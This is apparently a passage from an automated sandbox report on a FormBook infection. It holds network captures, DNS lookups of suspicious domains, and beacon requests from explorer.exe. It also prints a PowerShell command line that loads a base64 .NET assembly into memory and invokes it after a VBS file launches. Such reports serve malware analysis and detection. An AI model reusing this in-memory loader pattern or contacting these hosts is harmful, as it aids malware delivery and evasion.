                                        Jul 13, 2023 09:48:53.571875095 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.571930885 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.571988106 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.572031021 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.572041988 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.572082996 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.572099924 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.572158098 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.572213888 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.572277069 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.572292089 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.572346926 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.572354078 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.572411060 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.572468042 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.572516918 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.572525024 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.572568893 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.572582006 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.572639942 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.572695017 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.572738886 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.572751999 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.572796106 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.572808981 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.572865009 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.572921991 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.572972059 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.572977066 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.573019981 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.573031902 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.573087931 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.573143959 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.573191881 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.573199987 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.573244095 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.573256016 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.573313951 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.576159000 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.751925945 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.752007961 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.752063990 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.752074003 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.752136946 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.752178907 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.752219915 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.752340078 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.752387047 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.752403975 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.752484083 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.752527952 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.752563000 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.752624035 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.752665997 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.752708912 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.752788067 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.752829075 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.752847910 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.752907038 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.752948046 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.752966881 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.753025055 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.753078938 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.753079891 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.753138065 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.753179073 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.753197908 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.753254890 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.753295898 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.753340006 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.753401995 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.753442049 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.753458977 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.753516912 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.753556967 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.753596067 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.753669024 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.753710032 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.753726959 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.753787041 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.753828049 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.753845930 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.753904104 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.753945112 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.753962040 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.754019022 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.754065990 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.754079103 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.754138947 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.754187107 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.754198074 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.754255056 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.754296064 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.754312992 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.754374981 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.754456997 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.754503965 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.754514933 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.754555941 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.754575014 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.754633904 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.754714966 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.754760027 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.754781008 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.754833937 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.754838943 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.754894018 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.754933119 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.754949093 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.755007982 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.755048037 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.755064964 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.755125046 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.755163908 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.933954954 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.934072018 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.934134960 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.934201002 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.934235096 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.934262991 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.934289932 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.934328079 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.934386015 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.934410095 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.934498072 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.934556007 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.934592962 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.934653044 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.934705973 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.934711933 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.934771061 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.934825897 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.934828997 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.934887886 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.934940100 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.934946060 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.935007095 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.935065031 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.935066938 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.935146093 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.935214996 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.935220003 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.935278893 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.935337067 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.935339928 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.935400963 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.935472965 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.935477018 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.935559988 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.935620070 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.935647011 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.935710907 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.935767889 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.935774088 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.935825109 CEST8049698188.166.220.201192.168.2.3
                                        Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                        Jul 13, 2023 09:48:52.429908037 CEST | 192.168.2.3 | 8.8.8.8 | 0xd5d6 | Standard query (0) | freswe.click | A (IP address) | IN (0x0001) | false
                                        Jul 13, 2023 09:49:56.655205965 CEST | 192.168.2.3 | 8.8.8.8 | 0x46eb | Standard query (0) | www.electorhome.com | A (IP address) | IN (0x0001) | false
                                        Jul 13, 2023 09:50:01.154997110 CEST | 192.168.2.3 | 8.8.8.8 | 0x1a86 | Standard query (0) | www.electorhome.com | A (IP address) | IN (0x0001) | false
                                        Jul 13, 2023 09:50:17.659744978 CEST | 192.168.2.3 | 8.8.8.8 | 0xcd38 | Standard query (0) | www.apinspect.net | A (IP address) | IN (0x0001) | false
                                        Jul 13, 2023 09:50:39.038078070 CEST | 192.168.2.3 | 8.8.8.8 | 0xb1f1 | Standard query (0) | www.baroevent.com | A (IP address) | IN (0x0001) | false
                                        Jul 13, 2023 09:51:21.069185019 CEST | 192.168.2.3 | 8.8.8.8 | 0xf7fa | Standard query (0) | www.hyperpigmentation-91528.bond | A (IP address) | IN (0x0001) | false
                                        Jul 13, 2023 09:51:44.267841101 CEST | 192.168.2.3 | 8.8.8.8 | 0xaa27 | Standard query (0) | www.rixiojjl.cfd | A (IP address) | IN (0x0001) | false
                                        Jul 13, 2023 09:52:04.736326933 CEST | 192.168.2.3 | 8.8.8.8 | 0x5b86 | Standard query (0) | www.krmq9w.cfd | A (IP address) | IN (0x0001) | false
                                        Jul 13, 2023 09:52:26.381526947 CEST | 192.168.2.3 | 8.8.8.8 | 0xb7a1 | Standard query (0) | www.qsmdrkjw.cfd | A (IP address) | IN (0x0001) | false
                                        Jul 13, 2023 09:52:47.396116018 CEST | 192.168.2.3 | 8.8.8.8 | 0x693 | Standard query (0) | www.lajzznhk.cfd | A (IP address) | IN (0x0001) | false

                                        Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                        Jul 13, 2023 09:48:52.485021114 CEST | 8.8.8.8 | 192.168.2.3 | 0xd5d6 | No error (0) | freswe.click | | 188.166.220.201 | A (IP address) | IN (0x0001) | false
                                        Jul 13, 2023 09:49:57.353049994 CEST | 8.8.8.8 | 192.168.2.3 | 0x46eb | No error (0) | www.electorhome.com | electorhome.com | | CNAME (Canonical name) | IN (0x0001) | false
                                        Jul 13, 2023 09:49:57.353049994 CEST | 8.8.8.8 | 192.168.2.3 | 0x46eb | No error (0) | electorhome.com | | 209.142.66.216 | A (IP address) | IN (0x0001) | false
                                        Jul 13, 2023 09:50:01.183917046 CEST | 8.8.8.8 | 192.168.2.3 | 0x1a86 | No error (0) | www.electorhome.com | electorhome.com | | CNAME (Canonical name) | IN (0x0001) | false
                                        Jul 13, 2023 09:50:01.183917046 CEST | 8.8.8.8 | 192.168.2.3 | 0x1a86 | No error (0) | electorhome.com | | 209.142.66.216 | A (IP address) | IN (0x0001) | false
                                        Jul 13, 2023 09:50:17.713550091 CEST | 8.8.8.8 | 192.168.2.3 | 0xcd38 | No error (0) | www.apinspect.net | apinspect.net | | CNAME (Canonical name) | IN (0x0001) | false
                                        Jul 13, 2023 09:50:17.713550091 CEST | 8.8.8.8 | 192.168.2.3 | 0xcd38 | No error (0) | apinspect.net | | 76.223.105.230 | A (IP address) | IN (0x0001) | false
                                        Jul 13, 2023 09:50:17.713550091 CEST | 8.8.8.8 | 192.168.2.3 | 0xcd38 | No error (0) | apinspect.net | | 13.248.243.5 | A (IP address) | IN (0x0001) | false
                                        Jul 13, 2023 09:50:39.345611095 CEST | 8.8.8.8 | 192.168.2.3 | 0xb1f1 | No error (0) | www.baroevent.com | baroevent.com | | CNAME (Canonical name) | IN (0x0001) | false
                                        Jul 13, 2023 09:50:39.345611095 CEST | 8.8.8.8 | 192.168.2.3 | 0xb1f1 | No error (0) | baroevent.com | | 99.83.196.71 | A (IP address) | IN (0x0001) | false
                                        Jul 13, 2023 09:50:39.345611095 CEST | 8.8.8.8 | 192.168.2.3 | 0xb1f1 | No error (0) | baroevent.com | | 75.2.85.42 | A (IP address) | IN (0x0001) | false
                                        Jul 13, 2023 09:51:21.146644115 CEST | 8.8.8.8 | 192.168.2.3 | 0xf7fa | No error (0) | www.hyperpigmentation-91528.bond | | 185.53.179.91 | A (IP address) | IN (0x0001) | false
                                        Jul 13, 2023 09:51:44.571615934 CEST | 8.8.8.8 | 192.168.2.3 | 0xaa27 | Name error (3) | www.rixiojjl.cfd | none | none | A (IP address) | IN (0x0001) | false
                                        Jul 13, 2023 09:52:05.012703896 CEST | 8.8.8.8 | 192.168.2.3 | 0x5b86 | Name error (3) | www.krmq9w.cfd | none | none | A (IP address) | IN (0x0001) | false
                                        Jul 13, 2023 09:52:26.689048052 CEST | 8.8.8.8 | 192.168.2.3 | 0xb7a1 | No error (0) | www.qsmdrkjw.cfd | | 150.95.255.38 | A (IP address) | IN (0x0001) | false
                                        Jul 13, 2023 09:52:47.686402082 CEST | 8.8.8.8 | 192.168.2.3 | 0x693 | No error (0) | www.lajzznhk.cfd | | 150.95.255.38 | A (IP address) | IN (0x0001) | false
                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                        0 | 192.168.2.3 | 49698 | 188.166.220.201 | 80 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        Timestamp | kBytes transferred | Direction | Data
                                        Jul 13, 2023 09:48:52.676951885 CEST | 0 | OUT | GET /v/sino.txt HTTP/1.1
                                        Host: freswe.click
                                        Connection: Keep-Alive
                                        Jul 13, 2023 09:48:52.855475903 CEST | 1 | IN | HTTP/1.1 200 OK
                                        Date: Thu, 13 Jul 2023 07:48:52 GMT
                                        Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.2.4
                                        Last-Modified: Thu, 13 Jul 2023 01:25:13 GMT
                                        ETag: "3daac-6005434384d5a"
                                        Accept-Ranges: bytes
                                        Content-Length: 252588
                                        Keep-Alive: timeout=5, max=100
                                        Connection: Keep-Alive
                                        Content-Type: text/plain


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                        1 | 192.168.2.3 | 49701 | 76.223.105.230 | 80 | C:\Windows\explorer.exe
                                        Timestamp | kBytes transferred | Direction | Data
                                        Jul 13, 2023 09:50:17.734031916 CEST | 267 | OUT | GET /g94s/?e8a=SOSNSp6179aTy13qq7TcaAlSRULweXb3E3crC3cjWejL5clntEZHzdPIzB6indnn7XUZ&DrKTC2=LjGd HTTP/1.1
                                        Host: www.apinspect.net
                                        Connection: close
                                        Data Raw: 00 00 00 00 00 00 00
                                        Data Ascii:
                                        Jul 13, 2023 09:50:17.770692110 CEST | 268 | IN | HTTP/1.1 301 Moved Permanently
                                        location: https://apinspect.net/g94s/?e8a=SOSNSp6179aTy13qq7TcaAlSRULweXb3E3crC3cjWejL5clntEZHzdPIzB6indnn7XUZ&DrKTC2=LjGd
                                        vary: Accept-Encoding
                                        server: DPS/2.0.0+sha-2862925
                                        x-version: 2862925
                                        x-siteid: eu-central-1
                                        set-cookie: dps_site_id=eu-central-1; path=/
                                        date: Thu, 13 Jul 2023 07:50:17 GMT
                                        keep-alive: timeout=5
                                        transfer-encoding: chunked
                                        connection: close
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                        2 | 192.168.2.3 | 49702 | 99.83.196.71 | 80 | C:\Windows\explorer.exe
                                        Timestamp | kBytes transferred | Direction | Data
                                        Jul 13, 2023 09:50:39.367477894 CEST | 269 | OUT | GET /g94s/?DrKTC2=LjGd&e8a=GuZ41zQWOd+87sgZ9z9r0yJ0b7/bNTnEQt2o5soiWmDSZcifYwExlLr0dWNcGWkaVVoe HTTP/1.1
                                        Host: www.baroevent.com
                                        Connection: close
                                        Data Raw: 00 00 00 00 00 00 00
                                        Data Ascii:
                                        Jul 13, 2023 09:50:39.839054108 CEST | 270 | IN | HTTP/1.1 403
                                        Date: Thu, 13 Jul 2023 07:50:39 GMT
                                        Content-Type: application/json;charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Set-Cookie: JSESSIONID=DA95767C8645FF60486BC80990A57CE3; Path=/; HttpOnly
                                        X-Content-Type-Options: nosniff
                                        X-XSS-Protection: 1; mode=block
                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                        Pragma: no-cache
                                        Expires: 0
                                        Data Raw: 37 39 0d 0a 7b 22 74 69 6d 65 73 74 61 6d 70 22 3a 22 32 30 32 33 2d 30 37 2d 31 33 54 30 37 3a 35 30 3a 33 39 2e 37 30 31 2b 30 30 30 30 22 2c 22 73 74 61 74 75 73 22 3a 34 30 33 2c 22 65 72 72 6f 72 22 3a 22 46 6f 72 62 69 64 64 65 6e 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 41 63 63 65 73 73 20 44 65 6e 69 65 64 20 21 22 2c 22 70 61 74 68 22 3a 22 2f 67 39 34 73 2f 22 7d 0d 0a
                                        Data Ascii: 79{"timestamp":"2023-07-13T07:50:39.701+0000","status":403,"error":"Forbidden","message":"Access Denied !","path":"/g94s/"}
                                        Jul 13, 2023 09:50:39.839086056 CEST | 270 | IN | Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                        3 | 192.168.2.3 | 49703 | 185.53.179.91 | 80 | C:\Windows\explorer.exe
                                        Timestamp | kBytes transferred | Direction | Data
                                        Jul 13, 2023 09:51:21.203156948 CEST | 271 | OUT | GET /g94s/?DrKTC2=LjGd&e8a=tzSFV3H7hErTYvWZwPPC/GAyGN0rrg2x5F2fwYgRRUbDdRuSW2XehEr5Lw08uOFm07l+ HTTP/1.1
                                        Host: www.hyperpigmentation-91528.bond
                                        Connection: close
                                        Data Raw: 00 00 00 00 00 00 00
                                        Data Ascii:
                                        Jul 13, 2023 09:51:21.229859114 CEST | 271 | IN | HTTP/1.1 403 Forbidden
                                        Server: nginx
                                        Date: Thu, 13 Jul 2023 07:51:21 GMT
                                        Content-Type: text/html
                                        Content-Length: 146
                                        Connection: close
                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                        Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                        4 | 192.168.2.3 | 49704 | 150.95.255.38 | 80 | C:\Windows\explorer.exe
                                        Timestamp | kBytes transferred | Direction | Data
                                        Jul 13, 2023 09:52:26.959572077 CEST | 272 | OUT | GET /g94s/?e8a=4rsHG0K5vlabiiLb0b+gqyCvQQblgz1hCMRkDjqQQizxtgmj5/lVmT/rQgDGf/7aGVqR&DrKTC2=LjGd HTTP/1.1
                                        Host: www.qsmdrkjw.cfd
                                        Connection: close
                                        Data Raw: 00 00 00 00 00 00 00
                                        Data Ascii:
                                        Jul 13, 2023 09:52:27.227644920 CEST | 273 | IN | HTTP/1.1 302 Found
                                        Date: Thu, 13 Jul 2023 07:52:27 GMT
                                        Server: Apache
                                        Location: http://dfltweb1.onamae.com
                                        Content-Length: 210
                                        Connection: close
                                        Content-Type: text/html; charset=iso-8859-1
                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://dfltweb1.onamae.com">here</a>.</p></body></html>


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                        5 | 192.168.2.3 | 49705 | 150.95.255.38 | 80 | C:\Windows\explorer.exe
                                        Timestamp | kBytes transferred | Direction | Data
                                        Jul 13, 2023 09:52:47.968513966 CEST | 274 | OUT | GET /g94s/?DrKTC2=LjGd&e8a=5qGn5zDRUH6BiPO85kMHocR4ZABcZylpPNAkuw/9HE6KA+R+11lsVjOMN8VjI6ygwzFy HTTP/1.1
                                        Host: www.lajzznhk.cfd
                                        Connection: close
                                        Data Raw: 00 00 00 00 00 00 00
                                        Data Ascii:
                                        Jul 13, 2023 09:52:48.247250080 CEST | 274 | IN | HTTP/1.1 302 Found
                                        Date: Thu, 13 Jul 2023 07:52:48 GMT
                                        Server: Apache
                                        Location: http://dfltweb1.onamae.com
                                        Content-Length: 210
                                        Connection: close
                                        Content-Type: text/html; charset=iso-8859-1
                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://dfltweb1.onamae.com">here</a>.</p></body></html>


                                        Code Manipulations

                                        Function Name | Hook Type | Active in Processes
                                        PeekMessageA | INLINE | explorer.exe
                                        PeekMessageW | INLINE | explorer.exe
                                        GetMessageW | INLINE | explorer.exe
                                        GetMessageA | INLINE | explorer.exe

                                        Function Name | Hook Type | New Data
                                        PeekMessageA | INLINE | 0x48 0x8B 0xB8 0x87 0x7E 0xED
                                        PeekMessageW | INLINE | 0x48 0x8B 0xB8 0x8F 0xFE 0xED
                                        GetMessageW | INLINE | 0x48 0x8B 0xB8 0x8F 0xFE 0xED
                                        GetMessageA | INLINE | 0x48 0x8B 0xB8 0x87 0x7E 0xED

                                        Target ID:0
                                        Start time:09:48:47
                                        Start date:13/07/2023
                                        Path:C:\Windows\System32\wscript.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Scan_Doc.vbs"
                                        Imagebase:0x7ff61db60000
                                        File size:163'840 bytes
                                        MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        Target ID:1
                                        Start time:09:48:49
                                        Start date:13/07/2023
                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Byte[]] $rOWg = [system.Convert]::FromBase64string('[base64 blob removed]');[System.AppDomain]::CurrentDomain.Load($rOWg).GetType('Fiber.Home').GetMethod('VAI').Invoke($null, [object[]] (' ??v?}???@+@ ?@@ ??v?}??.onis4*?*?#:?v4*?*?#:?k!}( }il!}( }.8*??(ws8*??(rf4*?*?#:?4*?*?#:??? }??+?p ??v?}?? ??v?}???*(??@*?','1No1me_Startup','2No3me_3tartup'))
                                        Imagebase:0x7ff752ef0000
                                        File size:447'488 bytes
                                        MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:.Net C# or VB.NET
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.396459578.00000210A1804000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.396459578.00000210A1804000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.396459578.00000210A1804000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.396459578.00000210A1804000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
